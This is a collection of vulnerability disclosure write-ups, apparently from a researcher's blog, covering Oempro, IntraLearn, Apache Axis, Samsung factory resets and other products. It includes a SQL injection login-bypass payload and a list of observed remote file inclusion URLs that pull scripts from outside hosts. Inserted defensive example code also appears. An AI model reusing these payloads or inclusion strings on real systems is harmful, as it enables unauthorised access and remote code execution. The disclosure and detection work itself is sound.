Disclosure: e-MDs, Inc. Solution Series 7.2.1.634 Screen Lock Failure Information Disclosure

e-MDs, Inc. Solution Series integrated electronic health record and practice management software version 7.2.1.634 contains a flaw in the screen lock functionality. Under some circumstances, when a user locks the screen, the login box is displayed but the information already on screen is not obscured. As I discovered on March 21, 2014 at my doctor’s office, the screen not only displayed some of my information including name, account number, date of birth, phone number, and doctor notes, it also showed the same information for a second patient.


Disclosure: Samsung Galaxy Phones Factory Reset Persistent Local Information Disclosure

A couple years back, I handed my Samsung Galaxy S1 down to a friend. When she got it she browsed the file system out of curiosity and noticed that it had retained private information; both from applications, as well as content I generated (e.g. pictures). While she promised to do a write-up of all the information left behind, she never did (flake!). This is obviously a problem for those who reset their phone thinking it is truly wiped clean, and then hand it off to a friend, sell it, or trade it in for credit.

The other day, a relative and I both upgraded our phones: him from a Galaxy S2 to an S5, and me from a Galaxy S3 to an S5. So I figured why not check both out to see if they did the same. Cliff notes: the Samsung Galaxy S2 (model SGH-T989) ‘factory reset’ leaves a lot of personal information behind, while the Samsung Galaxy S3 (model SGH-T999) does not. The S2 reset certainly does not delete your content.

Here is what I found left behind on the Galaxy S2. Directories for installed applications that were not deleted, or not deleted entirely:
\CamScanner
\foursquare
\gameloft
\Intsig
\Lazylist
\telenav
\data\flixster
\convertpad

files:
\telenav70\sdlogs\4\22\2014042208.txt
\telenav70\sdlogs\5\23\2014052320.txt
\Photo Editor\2014-03-30 19.11.22.jpg
(personal picture)
\lookout\log.txt
\Intsig\CamScanner\.log\log-2013-12-25_21-59-09.log
\DCIM\Camera
(55 personal pictures)
\contactBackup\contacts.csv
\contactBackup\contacts.pdf
(both contain the full list of contacts: name and phone #. This is from an app that backed up contact info)
\Android\data\com.zynga.words\cache\FBImages
(three images, FB avatar pics of players)
\Android\data\com.facebook.katana\cache\.facebook_-372648771.jpg
(private image from FB)
\tmp_fsquare.jpg
\tmp_fsq
(a PNG thumbnail of avatar selected for the app)
tmp_fsquare

The Galaxy S3 (model SGH-T999) that I used pretty heavily was much better after factory reset. I found the following left behind:

\Phone\Application\SMemo
(didn’t use this app despite installing it. The files suggest private info may be available after reset)

All pictures, contact info, and information from applications are gone. So somewhere between the Galaxy S1 and the Galaxy S3, Samsung finally figured out the ‘Factory Wipe’.


Disclosure: Mr Number for Android Screenlock Bypass Concern


Mr. Number is an Android app that allows you to do a variety of blocking for incoming communication. I’ve been using it for several months now and am quite happy. Crowd-sourced spam detection usually lets you know when a new number is spam. When a call comes in that is suspected spam, a pop-up appears with the option to close it, block the call, etc.


If your screen is locked, it still pops up over the lock. Sometimes, but not always, if you block the number and tap ‘done’, it will drop you past the screen lock to the Android desktop.


I haven’t been able to figure out what causes it to happen sometimes and not others. I asked someone more familiar with Android and he couldn’t reproduce it reliably, but he did confirm the issue. The attack scenario is that if you spoof a call to a device using a known bad number, you could conceivably bypass the screen lock. Not very practical, especially since it isn’t reliable.

[Thanks to Zach @OSVDB for pointing out I failed by not including the affected version: 1.3.1]

Disclosure: Oempro Multiple Vulnerabilities

[This was originally published on OSVDB, now gone. VulnDB IDs 50321, 50322, 50323, 50324]

Title: Oempro Multiple Vulnerabilities

Release Date: 2008-12-01
Application: Octeth Technologies, Oempro 3.5.5.1
Cross Ref: CVE-2008-3057, CVE-2008-3058, CVE-2008-3059
OSVDB: 50321 .. 50324
Reference: http://osvdb.org/ref/50/oempro.txt

Description:

“What is Oempro? Newsletters, product release announcement emails, e-cards, happy birthday emails, email reminders, auto responders, simply all kind of emails can easily be generated and sent by Oempro with powerful and detailed reporting features.”

Oempro contains a wide variety of vulnerabilities and configuration weaknesses that may allow an attacker to gain full access to the product, manipulate user accounts and more. The version tested was discovered on a vulnerability assessment and is relatively outdated. Subsequent versions were not available for testing.

1 – Cookies not marked Secure / HttpOnly

The Oempro application uses a PHPSESSID cookie to maintain authentication between the client and server. The cookie is set without the ‘secure’ (RFC 2109) or ‘httponly’ flag. The Secure flag ensures the cookie is only sent over an encrypted channel, and HttpOnly keeps it out of reach of client-side script, which helps protect it from disclosure via cross-site scripting attacks.

HTTP/1.1 200 OK
Date: Tue, 01 Jul 2008 06:57:13 GMT
Server: Apache/2.0.59
Keep-Alive: timeout=604800, max=100
Connection: keep-alive, close
Set-Cookie: PHPSESSID=e3a335d15ac0be7f204d8e09ce83b5da; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6665
Content-Type: text/html; charset=UTF-8

-and-

HTTP/1.1 302 Found
Date: Wed, 02 Jul 2008 04:34:42 GMT
Server: Apache/2.0.59
Keep-Alive: timeout=604800, max=100
Connection: keep-alive, close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: oempcliremme[0]=
Set-Cookie: oempcliremme[1]=
Set-Cookie: oempcliremme[2]=
Set-Cookie: oempcliremme[3]=
Set-Cookie: oempcli=e3a335d15ac0be7f204d8e09ce83b5da
Location: ./bridge.php?GoToURL=
Content-Length: 0
Content-Type: text/html; charset=UTF-8
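A checker for the flags discussed above, as an added example that is not part of the original advisory: it parses the Set-Cookie headers of a raw HTTP response and reports which of Secure and HttpOnly each session cookie lacks. The two responses embedded in it are reconstructed from the captures above, trimmed to the relevant headers.

```python
"""Report session cookies set without the Secure and HttpOnly flags."""

# Reconstructed (headers only) from the advisory's two captured responses.
RESPONSE_LOGIN = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PHPSESSID=e3a335d15ac0be7f204d8e09ce83b5da; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n\r\n"
)
RESPONSE_BRIDGE = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: oempcliremme[0]=\r\n"
    "Set-Cookie: oempcli=e3a335d15ac0be7f204d8e09ce83b5da\r\n"
    "Location: ./bridge.php?GoToURL=\r\n\r\n"
)


def set_cookie_headers(raw_response):
    """Return the value of every Set-Cookie header in a raw HTTP/1.x response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[1].strip()
            for line in head.split("\r\n")[1:]      # skip the status line
            if line.lower().startswith("set-cookie:")]


def cookie_flags(set_cookie_value):
    """Parse one Set-Cookie value into (cookie name, set of lowercased attributes)."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def missing_flags(raw_response, session_names=("PHPSESSID", "oempcli")):
    """Map each session cookie found in the response to the flags it lacks.

    Only names in session_names are reported: the empty oempcliremme[n]
    'remember me' cookies in the second capture carry no secret.
    """
    report = {}
    for value in set_cookie_headers(raw_response):
        name, attrs = cookie_flags(value)
        if name in session_names:
            report[name] = sorted({"secure", "httponly"} - attrs)
    return report
```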

2 – index.php SQL Injection Authentication Bypass

The authentication mechanism suffers from a SQL injection vulnerability that allows an attacker to bypass authentication. The ‘FormValue_Email’ variable (“Email” field) does not properly sanitize user input. By supplying SQL syntax such as ' or 0=0 #, an attacker will be logged in as an authenticated user. The structure of Oempro has several URLs that control the privilege of the account. Using this trick on /member/, /client/ and /admin/ will allow the attacker to authenticate as multiple accounts, including an administrator.

    Email:          ' or 0=0 #
    Password:       password
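The defect and its fix side by side, as an added example that is not Oempro's code: a login check that splices the email field into the SQL string, next to the same query with bound parameters. The users table and its single account are constructed, and because the block runs on SQLite, which has no `#` comment, the tautology input is terminated with the standard `--` comment instead of the advisory's `#`.

```python
"""String-built login query versus a parameterised one."""
import sqlite3


def make_db():
    """Constructed users table standing in for Oempro's member accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES "
                 "('admin@example.invalid', 'hunter2', 'admin')")
    return conn


def login_vulnerable(conn, email, password):
    """Builds the WHERE clause by concatenation, the pattern the advisory
    describes for FormValue_Email. Returns the matched role or None."""
    sql = ("SELECT role FROM users WHERE email = '" + email
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterised(conn, email, password):
    """Same query with bound parameters: the input is only ever data."""
    row = conn.execute(
        "SELECT role FROM users WHERE email = ? AND password = ?",
        (email, password)).fetchone()
    return row[0] if row else None


def compare(email, password):
    """Run both login paths on a fresh database; returns (vulnerable, fixed)."""
    conn = make_db()
    return (login_vulnerable(conn, email, password),
            login_parameterised(conn, email, password))
```

With the tautology as the email, `compare` returns `("admin", None)`: the concatenated query comments out the password check, the parameterised one simply finds no such email.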

3 – /member/settings_account.php Cleartext Password Disclosure

Once authenticated, legitimately or via the SQL injection listed above, the application sends the user’s password in cleartext on the ‘Settings – Account Information’ tab (/member/settings_account.php). The password is stored in a hidden field (FormValue_Password) and only visually obscured with asterisks for the end user.

[Original PoC removed]

4 – /client/campaign_track.php FormValue_SearchKeywords Variable SQL Injection

The campaign tracking page (/client/campaign_track.php) does not properly filter user-supplied input, allowing for arbitrary SQL syntax to be passed to the database.

5 – Cross-frame Scripting

As described in CVE-2004-2383, the Oempro application does not implement code to prevent Cross-frame scripting attacks. This can be used to construct phishing attacks to more convincingly steal user credentials. While this is a browser based vulnerability, applications can add a small amount of script code to ensure the window is not loaded via a frame.

Product Details:

Vendor: Octeth Technologies
Product: Oempro
Version: 3.5.5.1

Solution:

Upgrade to version 4.

Disclosure Timeline:

2008-07-02: Vulnerability Discovered
2008-07-05: Disclosed to Vendor via [sales|press|security]@octeth.com
2008-07-05: security@ invalid. Sales #HZS-628697 opened automatically.
2008-07-07: CVE numbers assigned
2008-07-14: Vendor Acknowledgement from C.H.
2008-09-16: v4, said to fix issues, still not released
2008-10-05: Mail sent to C.H. asking for V4 release ETA
2008-11-22: v4 released, reportedly addresses issues
2008-12-01: Public Disclosure

CVE:

This issue is a candidate for inclusion in the Common Vulnerabilities and Exposures (CVE) list (http://cve.mitre.org), which standardizes names for security problems. The CVE initiative has assigned CVE Candidate CVE-2008-3057 (cookie handling), CVE-2008-3058 (sql injection) and CVE-2008-3059 (password disclosure) to this issue.

References:

OSVDB: http://osvdb.org/50321 .. 50324
Vendor: http://octeth.com/products/oempro/
XSS Information: http://en.wikipedia.org/wiki/Cross_site_scripting
HttpOnly Cookie XSS Mitigation: http://msdn.microsoft.com/en-us/library/ms533046(VS.85).aspx

Disclosure: Multiple Software Remote File Inclusion

[This was originally disclosed on the VIM mail list. VulnDB IDs 90794, 90795, 90796. This was the result of watching Apache logs on attrition.org and observing a wide variety of RFI attacks. I started comparing some of the scripts being attempted with OSVDB and noticed some were not found. That means these were essentially 0days being exploited in the wild.]

Quick searches didn’t find these in OSVDB. I haven’t had time to check the other VDBs.

/contenido/external/frontend/news.php?cfg[path][includes]=http://www.jef.at/vn

/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/res.txt??

/claroline/tracking/userLog.php?rootSys=http://www.free-ddl.com/siteadmin/test.txt%3f%3f%3f

/admin/cron_pop.php?adm_path=http://www.smagz.com/bo.do%3f%3f

/class/class.dashboard_lms.php?where_framework=http://www.randdesign.de/ppoint/include/main.txt??

/modules/TotalCalendar/validcode.php?inc_dir=http://www.geocities.com/injitinjitsemut/cmd1.txt??

/classified_right.php?language_dir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??

/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.unescoulsan.org/bbs//data/safe1.txt???
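Detection logic for the pattern seen above, as an added example and not anything the post itself ran: it parses Apache combined-format lines and flags requests whose query string hands a remote URL to an include-style parameter. The four log lines are constructed, with placeholder hosts (rfi.example, example.org) standing in for the real servers seen in the attempts above; the parameter-name heuristic is an assumption tuned to the names in this list.

```python
"""Flag remote file inclusion attempts in Apache access logs."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines: two RFI attempts shaped like the ones above,
# a normal page request, and a redirect that passes a URL legitimately.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jun/2008:10:11:12 +0000] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://rfi.example/vn HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [02/Jun/2008:10:11:13 +0000] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rfi.example/safe1.txt??? HTTP/1.1" 404 0 "-" "Mozilla/4.0"
198.51.100.4 - - [02/Jun/2008:10:12:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [02/Jun/2008:10:12:05 +0000] "GET /redirect.php?url=http://example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Heuristic (assumption): the parameters abused above are all path/prefix/
# include style names. Plain "url=" parameters are left alone to cut noise.
INCLUDE_PARAM_RE = re.compile(
    r'path|dir|prefix|inc|include|root|framework|cfg|config', re.IGNORECASE)


def rfi_attempts(log_text):
    """Return (client ip, script path, parameter, remote url) per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        parts = urlsplit(m.group("target"))
        # parse_qsl also decodes %5B/%5D, so env%5Binclude_prefix%5D
        # comes back as env[include_prefix].
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value) and INCLUDE_PARAM_RE.search(name):
                hits.append((m.group("ip"), parts.path, name, value))
    return hits
```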

Disclosure: IntraLearn 2.1 Multiple Vulnerabilities

http://www.intralearn.com/

1) Cross-site Scripting (XSS)

URL                            Variables
/library/description_link.cfm  outline, course
/library/courses_catalog.cfm   records_to_display, the_start

2) Login Information Cached In Memory

The login POST request for IntraLearn returns a 200 OK HTTP response code. As long as the browser window is not closed, it is possible for someone to use the browser’s “Back” button until the page after the login page is reached. At this point, the browser will prompt the user to re-post the data to the server. This data, the username and password, is pulled from memory and resubmitted to the server. The user will then be authenticated to the IntraLearn application.
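The usual fix for this is to answer the login POST with a redirect rather than a 200, so the page after login is reached by a GET and “Back” has no form data to offer for resubmission. The handler below is an added example, not IntraLearn’s code: a minimal WSGI login that returns 303 See Other with a session cookie; the account, the cookie name and the in-process request driver are assumptions.

```python
"""Post/Redirect/Get login: the POST never becomes a page in browser history."""
import io
import secrets
from urllib.parse import parse_qs, urlencode

USERS = {"alice": "correct horse"}   # constructed account


def login_app(environ, start_response):
    """WSGI app: POST /login answers 303 to /home on success, 200 otherwise."""
    if environ["REQUEST_METHOD"] == "POST" and environ["PATH_INFO"] == "/login":
        length = int(environ.get("CONTENT_LENGTH") or 0)
        form = parse_qs(environ["wsgi.input"].read(length).decode())
        user = form.get("username", [""])[0]
        if USERS.get(user) == form.get("password", [""])[0]:
            token = secrets.token_hex(16)
            # The redirect means the post-login page is fetched by GET;
            # the cookie carries the session with both flags set.
            start_response("303 See Other", [
                ("Location", "/home"),
                ("Set-Cookie", f"session={token}; Path=/; Secure; HttpOnly"),
            ])
            return [b""]
        start_response("200 OK", [("Content-Type", "text/plain")])
        return [b"login failed"]
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"login form"]


def post_login(username, password):
    """Drive the app with one in-process POST; returns (status, headers dict)."""
    body = urlencode({"username": username, "password": password}).encode()
    environ = {"REQUEST_METHOD": "POST", "PATH_INFO": "/login",
               "CONTENT_LENGTH": str(len(body)), "wsgi.input": io.BytesIO(body)}
    captured = {}

    def start_response(status, headers):
        captured["status"], captured["headers"] = status, dict(headers)

    b"".join(login_app(environ, start_response))
    return captured["status"], captured["headers"]
```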

3) IntraLearn Physical Path Disclosure

Several pages of the IntraLearn web application disclose the physical path of the software installation. By making a direct request to one of several pages, the application will produce an error message that discloses the information.

/help/1/Instructor/Knowledge_Impact_Course.htm
/help/1/Instructor/LRN-formatted_Course.htm
/help/1/Instructor/Create_Course.htm

2008-02-17 support@intralearn.com contacted
2008-02-21 reply from P.D. @intralearn received; 2.1 is outdated, up to 4.2.3 or 5.1 (soon) to fix
2008-03-15 disclosed

Disclosure: Apache Axis Nonexistent Java Web Service Remote Path Disclosure

[This was originally disclosed on the VIM mail list. VulnDB ID 34154]

Watchfire’s Appscan product looks for this vulnerability (not sure what they officially title it, the title above is my own), but I can’t find any reference to it. Google finds a lot of indirect references suggesting it is common knowledge to the folks who use the product. Has anyone seen this before or have a reference?


Requesting this URL will generate the error message:

http://[target]/axis/tt_pm4l.jws?wsdl

AXIS error

Sorry, something seems to have gone wrong… here are the details:

Fault – java.io.FileNotFoundException:
c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)

AxisFault
faultCode: {http://xml.apache.org/axis/}Server.userException
faultString: java.io.FileNotFoundException:
c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)
faultActor: null
faultDetail:
stackTrace: java.io.FileNotFoundException:
c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)

[SNIP]

Disclosure: Annuaire (Directory) Multiple Vulnerabilities

[This was originally published on OSVDB, now gone. VulnDB IDs 24302, 24303]

Comment left on feedback page:
http://www.brunox.org/modules.php?op=modload&name=FeedBack&file=index

While testing your demo of Annuaire (Directory), I noticed a few security vulnerabilities:

Many pages are calling /include/lang-en.php which is showing the full installation path. Additionally, directly requesting this script will reveal the full path.

inscription.php: The comment field (COMMENTAIRE variable) allows for cross-site scripting (XSS) attacks.

Thanks

Brian

Disclosure: ARIA (Accounting Receiving and Inventory Administration) genmessage.php Message Field XSS

[This was originally published on OSVDB, now gone. VulnDB ID 24255]

From: security curmudgeon
To: jflechtner[at]users.sourceforge.net
Date: Tue, 28 Mar 2006 11:25:02 -0500 (EST)
Subject: ARIA security issue

Hey Josh,

Not sure if you are still maintaining this project, but while playing with the demo I noticed a small security issue. The genmessage.php script doesn’t sanitize user input submitted to the Message Field (message variable) allowing for cross-site scripting (XSS) attacks. I didn’t test the other scripts so this may occur in other scripts.

Thanks,

Brian

Disclosure: @1 Event Publisher / @1 Table Publisher Multiple Vulnerabilities

[This was originally published on OSVDB, now gone. VulnDB 24235, 24236, 24237, 24238]

Ticket has been submitted. The ticket number is SCR00994.

While looking at some of your scripts, I noticed there are a few security issues:

UPOINT @1 Event Publisher
eventpublisher_admin.htm does not validate input to the Event, Description, Time, Website, and Public Remarks fields. This can be used for cross-site scripting (XSS) attacks.

eventpublisher_usersubmit.htm does not validate input to the Event, Description, Time, Website, and Public Remarks fields. This can be used for cross-site scripting (XSS) attacks.

A direct request to eventpublisher.txt will reveal the contents of private comments.

UPOINT @1 Table Publisher
tablepublisher.cgi does not validate input to the Title of Table field, which can be used for XSS attacks.

Thanks